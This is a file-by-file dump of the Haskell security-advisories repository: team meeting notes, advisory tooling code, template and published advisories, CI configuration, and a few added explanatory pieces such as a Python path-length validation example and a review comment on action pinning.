But the relevant maintainer is on 10 | vacation. 11 | 12 | ## Completed tooling work 13 | 14 | * migrate "is version affected" functions to library (#253) 15 | * feat: add links in OSV exports (#165, #252) 16 | * Gautier has published the new package versions on Hackage 17 | (thanks!) 18 | -------------------------------------------------------------------------------- /meeting-notes/2023-11-01.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-11-01 2 | 3 | Previous notes: https://edit.smart-cactus.org/cpEZf5ykQZGowfAzI3OPcA?both# 4 | 5 | ## Present 6 | 7 | - Tristan, Gautier and Fraser 8 | 9 | 10 | ## CVSS 11 | 12 | - Tristan is working through the TODOs. 13 | 14 | ## GitHub automation 15 | 16 | - Fraser is hoping to start work during the next 2 weeks. 17 | 18 | 19 | ## Outstanding embargoed issue 20 | 21 | - Follow up with Mihai if he knows the status. We might 22 | set a date for disclosure and advise downstream and upstream 23 | 24 | ## Quarterly report 25 | 26 | - We are overdue for the Q3 report. Fraser will draft 27 | a report in the next period. -------------------------------------------------------------------------------- /meeting-notes/2025-04-02.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-04-02 2 | 3 | Present: Gautier, Montez, Mihai, Jose 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-03-20.md 7 | 8 | ## ZuriHac + Ecosystem Workshop 9 | 10 | - Gautier confirmed his attendance for the full event. 11 | - Mihai still a maybe. 
12 | 13 | ## HSEC-2025-0002: Double Public Key Signing Function Oracle Attack on Ed25519 14 | 15 | - Gautier created the PR for cryptonite [#268](https://github.com/haskell/security-advisories/pull/268) 16 | - Tristan noticed crypton was also vulnerable 17 | - Fraser submitted a patch 18 | - The maintainer published a new version on Hackage 19 | -------------------------------------------------------------------------------- /code/hsec-sync/src/Security/Advisories/Sync/Url.hs: --------------------------------------------------------------------------------
{-# LANGUAGE LambdaCase #-}
module Security.Advisories.Sync.Url
  ( mkUrl
  , ensureFile
  )
where

-- | Join URL path segments, inserting exactly one '/' between them.
mkUrl :: [String] -> String
mkUrl = foldl1 (</>)

infixr 5 </>

-- | Path-joining operator: appends the right operand to the left one with a
-- single '/' between them, whatever combination of trailing and leading
-- slashes the two pieces carry. (The operator name was lost to extraction in
-- the dump above; '</>' is the name used in hsec-sync.)
(</>) :: String -> String -> String
"/" </> ('/' : ys) = '/' : ys
"/" </> ys = '/' : ys
"" </> ('/' : ys) = '/' : ys
"" </> ys = '/' : ys
[x] </> ('/' : ys) = x : '/' : ys
[x] </> ys = x : '/' : ys
(x0 : x1 : xs) </> ys = x0 : ((x1 : xs) </> ys)

-- | Drop a single trailing '/' so the result names a file rather than a
-- directory ("a/b/" becomes "a/b"; "a/b" is returned unchanged).
ensureFile :: String -> String
ensureFile =
  \case
    "" -> ""
    "/" -> ""
    (x:xs) -> x : ensureFile xs
-------------------------------------------------------------------------------- /meeting-notes/2023-12-13.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-12-13 2 | 3 | Previous meeting notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-11-29.md 4 | 5 | ## Previous AIs 6 | 7 | - Website publication (from https://github.com/haskell/security-advisories/tree/generated/gh-pages ) 8 | - "Quarterly" report still TODO 9 | 10 | ## OSV output fixed 11 | 12 | - Reported by a community member: https://github.com/haskell/security-advisories/issues/135 13 | 14 | ## Website 15 | 16 | - Need to request the creation of this repository: https://github.com/haskell/haskell.github.io 17 | 18 | ## CWE data type 19 | 20 | - TC: to add osv export golden test and rebase 
the PR 21 | -------------------------------------------------------------------------------- /meeting-notes/2024-01-24.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-01-24 2 | 3 | Previous meeting notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-01-10.md 4 | 5 | ## Undisclosed security issue 6 | 7 | - Received via the mailing-list 8 | - the reporter was unable to send the full report (the PDF is too big) 9 | - Gautier has contacted the maintainers. 10 | 11 | ## WebSite got published 12 | 13 | Initial version is now available at: https://haskell.github.io/security-advisories/ 14 | 15 | ## Report got published 16 | 17 | The H2 report has been published on discourse: 18 | https://discourse.haskell.org/t/haskell-security-response-team-2023-july-december-report/8531 19 | -------------------------------------------------------------------------------- /meeting-notes/2025-11-27.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-11-27 2 | 3 | Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-10-30.md 4 | 5 | ## Status on embargoed advisory 6 | (redacted) 7 | 8 | ## Repo re-org 9 | 10 | - It was merged, some stuff broke (including cabal-audit) 11 | 12 | - Fraser fixed OSV publishing. 
13 | 14 | Downstream breakage: 15 | 16 | - Report: 17 | https://github.com/haskell/security-advisories/issues/304 18 | (Gautier will brain-dump into that discussion) 19 | - cabal-audit report: 20 | https://github.com/MangoIV/cabal-audit/issues/64 21 | 22 | - Lesson: we need integration tests 23 | - **Idea: should we write an integration guide?** 24 | -------------------------------------------------------------------------------- /meeting-notes/2024-12-11.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-12-11 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-11-27.md 5 | 6 | ## GitHub OSSF 7 | 8 | - Gautier published a draft on the SRT mailing list 9 | - Let's review it on the ML and publish it on Discourse 10 | 11 | ## json-schema validation in CI 12 | 13 | - The task is proposed in 14 | [#254](https://github.com/haskell/security-advisories/pull/254). 15 | - Tested and validated, ready for merge. 16 | 17 | ## Advisories index hosting 18 | 19 | - Gautier improved advisory's page layout 20 | - Start to discuss haskell.org with Jose, he'll talk about it in the 21 | next *haskell.org*/*infrastructure* meeting 22 | -------------------------------------------------------------------------------- /meeting-notes/2025-08-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-08-20 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-08-07.md 5 | 6 | Attended: 7 | 8 | - Fraser 9 | - Gautier 10 | - Montez 11 | 12 | 13 | ## Database structure re-org 14 | 15 | - FT proposed reorg of database 16 | - Gautier made a PR: 17 | https://github.com/haskell/security-advisories/pull/293 18 | - Mihai reviewed. FT will also review it. 19 | 20 | ## HSEC Top Ten? 21 | 22 | - About time we did this blog post / guide :) FT will draft it. 
23 | 24 | ## Security prospectus 25 | 26 | - Montez will start pulling ideas together 27 | - FT will mail the list to define objectives and audience of the 28 | prospectus 29 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/EXAMPLE_ADVISORY_GHC.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-0000-0000" 5 | cwe = [] 6 | keywords = ["example", "freeform", "keywords"] 7 | aliases = ["CVE-2022-XXXX"] 8 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 9 | 10 | [[affected]] 11 | ghc-component = "ghci" 12 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 13 | 14 | [[affected.versions]] 15 | introduced = "1.0.8" 16 | fixed = "1.1" 17 | [[affected.versions]] 18 | introduced = "1.1.2" 19 | 20 | [[references]] 21 | type = "ARTICLE" 22 | url = "https://example.com" 23 | ``` 24 | 25 | # Advisory Template - Title Goes Here 26 | 27 | This is an example template. 28 | 29 | * Markdown 30 | * TOML "front matter". 31 | 32 | > Acme Broken. 33 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/EXAMPLE_ADVISORY_HACKAGE.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-0000-0000" 5 | cwe = [] 6 | keywords = ["example", "freeform", "keywords"] 7 | aliases = ["CVE-2022-XXXX"] 8 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 9 | 10 | [[affected]] 11 | package = "package-name" 12 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 13 | 14 | [[affected.versions]] 15 | introduced = "1.0.8" 16 | fixed = "1.1" 17 | [[affected.versions]] 18 | introduced = "1.1.2" 19 | 20 | [[references]] 21 | type = "ARTICLE" 22 | url = "https://example.com" 23 | ``` 24 | 25 | # Advisory Template - Title Goes Here 26 | 27 | This is an example template. 28 | 29 | * Markdown 30 | * TOML "front matter". 
31 | 32 | > Acme Broken. 33 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | All advisories in the HSec advisory database repository is dedicated to 2 | the public domain: 3 | 4 | https://creativecommons.org/publicdomain/zero/1.0/ 5 | 6 | By committing an advisory to this repository, you hereby waive all 7 | rights to the work worldwide under copyright law, including all 8 | related and neighboring rights, to the extent allowed by law. 9 | 10 | You can copy, modify, distribute, and retransmit any security advisory 11 | information in this repository, even for commercial purposes, without 12 | asking permission. 13 | 14 | ------------------------------------------------------- 15 | 16 | The code for processing advisories (in the "code" directory) is 17 | licensed separately, under the 3-clause BSD license. See 18 | code/LICENSE.txt for details. 19 | -------------------------------------------------------------------------------- /code/hsec-tools/app/Util.hs: -------------------------------------------------------------------------------- 1 | {-# LANGUAGE LambdaCase #-} 2 | 3 | module Util where 4 | 5 | import Data.Maybe (fromMaybe) 6 | import System.Exit (die) 7 | 8 | import Security.Advisories.Filesystem (isSecurityAdvisoriesRepo) 9 | import Security.Advisories.Git (getRepoRoot) 10 | 11 | -- | Ensure the given path (or current directory "." if @Nothing@) 12 | -- is an advisory Git repo. Return the (valid) repo root, or die 13 | -- with an error message. 14 | -- 15 | ensureRepo :: Maybe FilePath -> IO FilePath 16 | ensureRepo mPath = 17 | getRepoRoot (fromMaybe "." 
mPath) >>= \case 18 | Left _ -> die "Not a git repo" 19 | Right repoPath -> isSecurityAdvisoriesRepo repoPath >>= \case 20 | False -> die "Not a security-advisories repo" 21 | True -> pure repoPath 22 | -------------------------------------------------------------------------------- /meeting-notes/2024-02-07.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-02-07 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-01-24.md 5 | 6 | ## Ongoing security issue (embargoed) 7 | 8 | - SRT agrees it matters, but it is out of our hands. 9 | - All we can do is make recommendations. 10 | - Mihai will lead response. 11 | 12 | ## hackage-server 13 | 14 | - Gautier filed a PR adding link to security-advisories repo: 15 | https://github.com/haskell/hackage-server/pull/1292 16 | 17 | ## Small CLI improvements 18 | 19 | - A community member worked on small fix in 20 | [#147](https://github.com/haskell/security-advisories/pull/147) and 21 | bootstrapped the cabal audit command in 22 | [#148](https://github.com/haskell/security-advisories/pull/148). 23 | -------------------------------------------------------------------------------- /meeting-notes/2024-07-10.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-07-10 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-06-26.md 5 | 6 | ## Advisories ecosystem ([#213](https://github.com/haskell/security-advisories/pull/213)) 7 | 8 | - Schema update proposed. 9 | - Example advisories for GHC proposed in [#214](https://github.com/haskell/security-advisories/pull/214). 10 | 11 | ## Snapshots 12 | 13 | - FT still needs to (re)review Gautier's PR. 
14 | 15 | ## Growing SRT / call for volunteers 16 | 17 | - Time to draft a call for volunteers ([previous one](https://discourse.haskell.org/t/call-for-volunteers-haskell-security-response-team/5770)) 18 | - How many people? 19 | 20 | ## Dependabot 21 | 22 | - Gautier will ping people who had previously attempted GitHub integration 23 | -------------------------------------------------------------------------------- /meeting-notes/2023-11-29.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-11-29 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-11-15.md 5 | 6 | ## Previous AIs 7 | 8 | - Website - generation and pushing to `generated/gh-pages` is done. 9 | But it is not being published as expected. Investigation ongoing. 10 | - FT synced with Jose. 11 | - "Quarterly" report still TODO 12 | 13 | ## Purl-spec refinements 14 | 15 | - https://github.com/haskell/security-advisories/issues/102 16 | - Casey: should be happening soon 17 | 18 | ## GitHub tooling 19 | 20 | - FT hoping to start over Christmas break 21 | 22 | ## Libraries 23 | 24 | - Still plan to do OSV extraction. 25 | - Still plan to extract our core Advisory types and parsing/printing. 26 | - Publishing our libs on Hackage. 27 | -------------------------------------------------------------------------------- /meeting-notes/2025-06-12.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-06-12 2 | 3 | Attended: Gautier, Fraser 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-05-28.md 7 | 8 | ## ZuriHac recap 9 | 10 | - Gautier and Tristan (and Jose) attended. 11 | - purl support PR: 12 | https://github.com/haskell/security-advisories/pull/282 13 | - Flora overall happy with our library support. 14 | - We need to implement support for more repos e.g. MLabs. 
15 | - design sketch: 16 | https://github.com/haskell/security-advisories/issues/240 17 | 18 | ## cabal dependency confusion advisory 19 | 20 | - https://github.com/haskell/security-advisories/pull/281 21 | - There are mitigations since v3.4.0.0, propose to set that as 22 | `fixed` version. 23 | - Not everyone agrees; discussion continues. 24 | -------------------------------------------------------------------------------- /code/hsec-tools/test/golden/EXAMPLE_ADVISORY_REPO.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | 3 | [advisory] 4 | id = "HSEC-0000-0000" 5 | cwe = [] 6 | keywords = ["example", "freeform", "keywords"] 7 | aliases = ["CVE-2022-XXXX"] 8 | related = ["CVE-2022-YYYY", "CVE-2022-ZZZZ"] 9 | 10 | [[affected]] 11 | repository-url = "https://hackage.example.org/" 12 | repository-name = "example" 13 | package = "package-name" 14 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" 15 | 16 | [[affected.versions]] 17 | introduced = "1.0.8" 18 | fixed = "1.1" 19 | [[affected.versions]] 20 | introduced = "1.1.2" 21 | 22 | [[references]] 23 | type = "ARTICLE" 24 | url = "https://example.com" 25 | ``` 26 | 27 | # Advisory Template - Title Goes Here 28 | 29 | This is an example template. 30 | 31 | * Markdown 32 | * TOML "front matter". 33 | 34 | > Acme Broken. 35 | -------------------------------------------------------------------------------- /meeting-notes/2024-08-21.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-08-21 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-08-07 5 | 6 | ## Embargoed vulnerability work 7 | 8 | We provided a fix and we are coordinating the disclosure. 9 | 10 | ## Call for Volunteers 11 | 12 | Jose wrote a draft to be communicated soon. 
13 | 14 | ## GitHub Action cabal-audit scan 15 | 16 | * Gautier has a minimal working version [GitHub Action](https://github.com/blackheaven/haskell-security-action) 17 | * Some example: [here](https://github.com/blackheaven/vulnerable-sandbox/security/code-scanning/1) 18 | * He made a [RFC](https://discourse.haskell.org/t/request-for-comments-github-haskell-security-action/10191) 19 | * After discussing with MangoIV, Gautier will upstream the sarif file generation in `cabal-audit` 20 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0006.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0006" 4 | cwe = [295] 5 | keywords = ["x509", "pki", "historical"] 6 | 7 | [[affected]] 8 | package = "x509-validation" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N" 10 | 11 | [[affected.versions]] 12 | introduced = "1.4.0" 13 | fixed = "1.4.8" 14 | 15 | [[references]] 16 | type = "FIX" 17 | url = "https://github.com/haskell-tls/hs-certificate/commit/06d15dbbc53739314760d8504ca764000770e46e" 18 | ``` 19 | 20 | # x509-validation does not enforce pathLenConstraint 21 | 22 | *x509-validation* prior to version 1.4.8 did not enforce the 23 | pathLenConstraint value. Constrained CAs could accidentally (or 24 | deliberately) issue CAs below the maximum depth and 25 | *x509-validation* would accept certificates issued by the 26 | unauthorised intermediate CAs. 
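The check the advisory describes as missing, written out as an added example (not code from the advisory or from x509-validation): the RFC 5280 section 6.1.4 pathLenConstraint logic run over constructed chains, including a constrained CA that issues a CA one level too deep, the case x509-validation before 1.4.8 accepted. Certificates are plain records with only the basicConstraints fields the check reads; no X.509 parsing is involved.

```python
# Added example (not the advisory's or x509-validation's code): RFC 5280 section
# 6.1.4, steps (l) and (m), over constructed certificate records.
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Cert:
    """Constructed stand-in for an X.509 certificate (basicConstraints only)."""
    subject: str
    issuer: str
    is_ca: bool                        # basicConstraints.cA
    path_len: Optional[int] = None     # basicConstraints.pathLenConstraint, if present

    @property
    def self_issued(self) -> bool:
        # Self-issued CA certificates (key rollover) do not consume depth (RFC 5280 6.1.4 l).
        return self.subject == self.issuer


class ChainError(Exception):
    """Raised when a chain violates basicConstraints."""


def check_path_len(chain: List[Cert]) -> int:
    """Validate pathLenConstraint along ``chain`` ordered root CA -> ... -> leaf.

    Returns the remaining depth budget on success and raises ChainError otherwise.
    The root's own constraint is applied like any other CA's, so a constrained
    root cannot silently sponsor a deeper hierarchy than it declared.
    """
    if len(chain) < 2:
        raise ValueError("need at least a root CA and a leaf certificate")
    # RFC 5280 6.1.2 (k): start with n, the number of certificates below the root.
    max_path_length = len(chain) - 1
    for cert in chain[:-1]:            # every issuing certificate; the leaf is not processed
        if not cert.is_ca:
            raise ChainError(f"{cert.subject}: issuer certificate is not a CA")
        # 6.1.4 (l): a non-self-issued CA consumes one unit of the remaining depth.
        if not cert.self_issued:
            if max_path_length <= 0:
                raise ChainError(f"{cert.subject}: pathLenConstraint of an ancestor CA exceeded")
            max_path_length -= 1
        # 6.1.4 (m): a tighter constraint on this CA narrows the remaining budget.
        if cert.path_len is not None and cert.path_len < max_path_length:
            max_path_length = cert.path_len
    return max_path_length


def chain_error(chain: List[Cert]) -> Optional[str]:
    """None when the chain passes the check, otherwise the violation message."""
    try:
        check_path_len(chain)
    except ChainError as exc:
        return str(exc)
    return None


# Constructed sample certificates (names are placeholders, not real CAs).
ROOT_PL1 = Cert("Root", "Root", True, path_len=1)   # may have at most one CA below it
ROOT_OPEN = Cert("Root", "Root", True)              # no pathLenConstraint
ROOT_ROLL = Cert("Root", "Root", True)              # self-issued rollover certificate
INT_A = Cert("A", "Root", True)
INT_A_PL0 = Cert("A", "Root", True, path_len=0)     # may only issue end-entity certs
INT_B = Cert("B", "A", True)
NOT_CA = Cert("A", "Root", False)
LEAF_A = Cert("leaf", "A", False)
LEAF_B = Cert("leaf", "B", False)

SAMPLE_CHAINS: Dict[str, List[Cert]] = {
    "root(pathLen=1) -> A -> leaf": [ROOT_PL1, INT_A, LEAF_A],
    "root(pathLen=1) -> A -> B -> leaf (too deep)": [ROOT_PL1, INT_A, INT_B, LEAF_B],
    "root -> A(pathLen=0) -> B -> leaf (A may not issue CAs)": [ROOT_OPEN, INT_A_PL0, INT_B, LEAF_B],
    "root -> A(pathLen=0) -> leaf": [ROOT_OPEN, INT_A_PL0, LEAF_A],
    "root(pathLen=1) -> root(self-issued) -> A -> leaf": [ROOT_PL1, ROOT_ROLL, INT_A, LEAF_A],
    "root -> non-CA -> leaf": [ROOT_OPEN, NOT_CA, LEAF_A],
}

if __name__ == "__main__":
    for name, chain in SAMPLE_CHAINS.items():
        print(f"{name}: {chain_error(chain) or 'ok'}")
```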
27 | -------------------------------------------------------------------------------- /docs/packages.md: -------------------------------------------------------------------------------- 1 | ## Packages owned by the Haskell SRT 2 | 3 | - [cvss](https://hackage.haskell.org/package/cvss) 4 | - [hsec-core](https://hackage.haskell.org/package/hsec-core) 5 | - [hsec-sync](https://hackage.haskell.org/package/hsec-sync) 6 | - [hsec-tools](https://hackage.haskell.org/package/hsec-tools) 7 | - [osv](https://hackage.haskell.org/package/osv) 8 | - [purl](https://hackage.haskell.org/package/purl) 9 | 10 | ## Maintainership policies 11 | 12 | At all times, at least 2 SRT members should be in the maintainer 13 | group for every SRT-owned package. 14 | 15 | Trusted collaborators can be added as maintainers at the discretion 16 | of the SRT. 17 | 18 | Non-SRT maintainers (including former SRT members) must be regularly 19 | reviewed. We will revoke the maintainership of inactive or 20 | unresponsive non-SRT maintainers, for safekeeping. 
21 | -------------------------------------------------------------------------------- /meeting-notes/2024-04-17.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-04-17 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-04-03.md 5 | 6 | ## YAML vulnerability 7 | 8 | * Assessment in progress for CVE-2024-3205 ([#181](https://github.com/haskell/security-advisories/issues/181)) 9 | 10 | ## Revised HSEC-2024-0003 11 | 12 | * Updated advisory to include released fixes ([#191](https://github.com/haskell/security-advisories/pull/191)) 13 | 14 | ## Initial Hackage password storage migration plan 15 | 16 | * Fraser came up with a draft 17 | * Some comments have been made but everyone agrees it is the right direction 18 | 19 | ## SRT meeting rescheduling 20 | 21 | * Over time the chosen time-slot seems to conflict with team members' schedules 22 | * Gautier will create and send a new poll to pick a more suitable one 23 | -------------------------------------------------------------------------------- /meeting-notes/2024-05-15.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-05-15 2 | 3 | Previous notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-05-01.md 5 | 6 | ## Cabal plan integration 7 | 8 | - A new cabal-audit project consuming the security-advisories is now being worked on: https://github.com/mangoiv/cabal-audit 9 | 10 | ## CI Security Advice Update 11 | 12 | - Shared on [discourse]( https://discourse.haskell.org/t/how-to-secure-github-repositories/9478) 13 | - Updated the guide based on feedback [PR#193](https://github.com/haskell/security-advisories/pull/193) 14 | 15 | ## Hackage Auth 16 | 17 | - Discussed with hackage team to improve the authentication scheme. 
18 | 19 | ## Dependencies analysis 20 | 21 | - Investigated getting in touch with deps.dev to increase audit coverage. 22 | - Also considering dependabot support for cabal dependencies. 23 | -------------------------------------------------------------------------------- /code/hsec-tools/src/Security/Advisories/Generate/TH.hs: -------------------------------------------------------------------------------- 1 | module Security.Advisories.Generate.TH ( 2 | readFileTH, 3 | readDirFilesTH, 4 | fileLocation, 5 | ) where 6 | 7 | import Control.Monad.IO.Class (liftIO) 8 | import Data.ByteString.Char8 as BS8 9 | import Data.FileEmbed (embedDir, makeRelativeToLocationPredicate) 10 | import Language.Haskell.TH (Exp (LitE), Lit (StringL), Q) 11 | 12 | -- | Read file at compile-time. 13 | readFileTH :: FilePath -> Q Exp 14 | readFileTH p = fileLocation p $ \p' -> LitE . StringL . BS8.unpack <$> liftIO (BS8.readFile p') 15 | 16 | -- | Read files in (sub-)directory at compile-time. 17 | -- Gives a [(FilePath, ByteString)] 18 | readDirFilesTH :: FilePath -> Q Exp 19 | readDirFilesTH p = fileLocation p embedDir 20 | 21 | fileLocation :: FilePath -> (FilePath -> Q Exp) -> Q Exp 22 | fileLocation fp act = makeRelativeToLocationPredicate (== "hsec-tools.cabal") fp >>= act 23 | -------------------------------------------------------------------------------- /meeting-notes/2023-11-15.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-11-15 2 | 3 | Previous notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-11-01.md 4 | 5 | ## Previous AIs 6 | 7 | - FT still need to write up (overdue) quarterly report 8 | 9 | ## cabal-install issue 10 | 11 | - It is now public and the HSEC advisory created. 
12 | - https://osv.dev/vulnerability/HSEC-2023-0015 13 | 14 | ## Purl-spec refinements 15 | 16 | - https://github.com/haskell/security-advisories/issues/102 17 | - This work should resume soon 18 | 19 | ## Website 20 | 21 | - https://github.com/haskell/security-advisories/issues/31 22 | - Where to publish 23 | - GitHub pages, and ask haskell.org for a subdomain? 24 | - Gautier will handle GitHub pages publication 25 | - **AI**: Mihai will ask. 26 | 27 | ## VEX 28 | 29 | ## New HF ED 30 | 31 | - FT will sync with Jose and let him know what we're up to. 32 | -------------------------------------------------------------------------------- /code/hsec-tools/CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.3.0.1 2 | 3 | * Bump `hsec-core` `0.3.0.0` 4 | 5 | ## 0.3.0.0 6 | 7 | * Move `isVersionAffectedBy` and `isVersionRangeAffectedBy` to `Security.Advisories.Core` (`hsec-core`) 8 | * Add support for GHC component in `query is-affected` 9 | * Add `model.database_specific.{repository,osvs,home}` and `model.affected.database_specific.{osv,human_link}` in OSV exports 10 | * Adapt to new security-advisories layout 11 | * Drop `Security.Advisories.Filesystem.parseComponentIdentifier` 12 | * Drop `Security.Advisories.Parse.OutOfBandAttributes.oobComponentIdentifier` 13 | * Drop `Security.Advisories.Parse.OOBError.PathHasNoComponentIdentifier` 14 | 15 | ## 0.2.0.2 16 | 17 | * Update `tasty` dependency bounds 18 | * Update `osv` dependency bounds 19 | 20 | ## 0.2.0.1 21 | 22 | - Rework HTML/Atom generation, use `atom-conduit` instead of `feed` 23 | 24 | ## 0.1.1.0 25 | 26 | - Redesign index 27 | -------------------------------------------------------------------------------- /meeting-notes/2024-03-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-03-20 2 | 3 | - Previous meeting: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-03-20.md 
5 | 6 | ## Code update 7 | 8 | - We implemented an atom feed in [#160](https://github.com/haskell/security-advisories/pull/157): https://haskell.github.io/security-advisories/atom.xml 9 | - We added a CAPEC field in [#164](https://github.com/haskell/security-advisories/pull/164). 10 | - The command line to check a given project is taking shape in [#148](https://github.com/haskell/security-advisories/pull/148). 11 | - The CWE module is still up for review ([#116](https://github.com/haskell/security-advisories/pull/116)). 12 | 13 | ## Advisory update 14 | 15 | - We published HSEC-2024-0002 quickly after the initial report ([#157](https://github.com/haskell/security-advisories/pull/157)). 16 | - We are coordinating a new issue reported via the mailing-list. 17 | -------------------------------------------------------------------------------- /meeting-notes/2025-05-15.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-05-15 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-04-30.md 5 | 6 | ## proposal: c-lib best practices guide 7 | 8 | - Two recommended approaches: 9 | - Use system clibs 10 | - Bundle the clib in a standalone cabal package, then depend on 11 | that. e.g.: 12 | - https://hackage.haskell.org/package/lzma-clib 13 | - https://hackage.haskell.org/package/libyaml-clib 14 | - Write up the recommended approaches and discourage other kinds of 15 | vendoring. 16 | - FT will propose to mailing list and see if someone will take it 17 | on. 18 | 19 | 20 | ## ZuriHac ideas 21 | 22 | - Gautier and Fraser populated the idea list: 23 | https://github.com/haskell/security-advisories/issues/272 24 | - Ecosystem library review, i.e. for security-related use cases, 25 | what libs are there. Can we do a list with commentary? 
26 | -------------------------------------------------------------------------------- /.github/haskell-ci.patch: -------------------------------------------------------------------------------- 1 | diff --git a/.github/workflows/haskell-ci.yml b/.github/workflows/haskell-ci.yml 2 | index 96282c2..e40c573 100644 3 | --- a/.github/workflows/haskell-ci.yml 4 | +++ b/.github/workflows/haskell-ci.yml 5 | 
@@ -19,6 +19,21 @@ 6 | jobs: 7 | + tools_changed: 8 | + continue-on-error: true 9 | + runs-on: ubuntu-24.04 10 | + outputs: 11 | + should_skip: ${{ steps.skip_check.outputs.should_skip }} 12 | + steps: 13 | + - id: skip_check 14 | + uses: fkirc/skip-duplicate-actions@v5.3.1 15 | + with: 16 | + concurrent_skipping: "never" 17 | + skip_after_successful_duplicate: "true" 18 | + paths: '["code/**"]' 19 | + do_not_skip: '["push", "workflow_dispatch", "schedule"]' 20 | linux: 21 | name: Haskell-CI - Linux - ${{ matrix.compiler }} 22 | + needs: tools_changed 23 | + if: ${{ needs.tools_changed.outputs.should_skip != 'true' }} 24 | runs-on: ubuntu-24.04 25 | timeout-minutes: 26 | 60 27 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0003.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0003" 4 | cwe = [94] 5 | keywords = ["code", "injection", "historical"] 6 | aliases = ["CVE-2013-1436"] 7 | 8 | [[affected]] 9 | package = "xmonad-contrib" 10 | cvss = "AV:N/AC:L/Au:N/C:P/I:P/A:P" 11 | [[affected.versions]] 12 | introduced = "0.5" 13 | fixed = "0.11.2" 14 | 15 | [[references]] 16 | type = "ADVISORY" 17 | url = "https://security.gentoo.org/glsa/201405-28" 18 | [[references]] 19 | type = "DISCUSSION" 20 | url = "http://www.openwall.com/lists/oss-security/2013/07/26/5" 21 | [[references]] 22 | type = "FIX" 23 | url = "https://github.com/xmonad/xmonad-contrib/commit/d3b2a01e3d01ac628e7a3139dd55becbfa37cf51" 24 | ``` 25 | 26 | # code injection in *xmonad-contrib* 27 | 28 | The `XMonad.Hooks.DynamicLog` module in _xmonad-contrib_ before 29 | **0.11.2** allows remote attackers to execute arbitrary commands via a 30 | web page title, which activates the commands when the user clicks on 31 | the xmobar window title, as demonstrated using an action tag. 
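Review bot: on the `haskell-ci.patch` hunk above, `uses: fkirc/skip-duplicate-actions@v5.3.1` pins a third-party action by a mutable tag; for a workflow in the advisory database's own repository, pin it by full commit SHA (keeping the tag in a trailing comment) so a moved or compromised tag cannot change what runs in CI. Two smaller points on the same hunk: `continue-on-error: true` on `tools_changed` combined with `if: ${{ needs.tools_changed.outputs.should_skip != 'true' }}` means a failing skip check leaves `should_skip` empty and the Linux job still runs, which is the safe direction but deserves a comment saying so; and with `paths: '["code/**"]'`, a pull request that only touches `.github/workflows/haskell-ci.yml` will be treated as a duplicate and skipped, so consider adding `.github/**` to `paths` if workflow changes should also be exercised.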
